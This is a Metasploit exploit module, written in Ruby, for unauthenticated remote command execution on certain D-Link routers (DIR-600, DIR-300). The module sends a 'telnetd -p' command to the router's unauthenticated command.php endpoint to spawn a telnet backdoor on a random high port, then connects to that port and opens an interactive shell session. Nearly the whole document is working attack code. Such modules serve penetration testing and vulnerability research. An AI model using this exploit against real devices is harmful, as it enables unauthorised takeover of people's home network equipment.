## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'D-Link Devices Unauthenticated Remote Command Execution', 'Description' => %q{ Various D-Link Routers are vulnerable to OS command injection via the web interface. The vulnerability exists in command.php, which is accessible without authentication. This module has been tested with the versions DIR-600 2.14b01, DIR-300 rev B 2.13. }, 'Author' => [ 'Michael Messner ', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-10048' ], [ 'OSVDB', '89861' ], [ 'EDB', '24453' ], [ 'BID', '57734' ], [ 'URL', 'http://web.archive.org/web/20240619081418/http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ], [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ] ], 'DisclosureDate' => '2013-02-04', 'Privileged' => true, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ [ 'Automatic', {} ] ], 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_advanced_options( [ OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]), OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10]) ] ) end def tel_timeout (datastore['TelnetTimeout'] || 10).to_i end def banner_timeout (datastore['TelnetBannerTimeout'] || 25).to_i end def session_timeout (datastore['SessionTimeout'] || 10).to_i end def exploit telnetport = rand(32767) + 32768 print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}") cmd = "telnetd -p #{telnetport}" # starting the telnetd gives no response print_status("#{rhost}:#{rport} - Sending exploit request...") request(cmd) print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx }) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end add_socket(sock) print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") prompt = negotiate_telnet(sock) if prompt.nil? sock.close fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") else print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect") end print_status("#{rhost}:#{rport} - Trying to create the Msf session...") begin Timeout.timeout(session_timeout) do activated = handler(sock) while (activated !~ /claimed/) activated = handler(sock) end end rescue ::Timeout::Error fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session") end end def request(cmd) uri = '/command.php' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'vars_post' => { "cmd" => cmd } }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice") end end def negotiate_telnet(sock) begin Timeout.timeout(banner_timeout) do while (true) data = sock.get_once(-1, tel_timeout) return nil if not data or data.length == 0 if data =~ /\x23\x20$/ return true end end end rescue ::Timeout::Error return nil end end end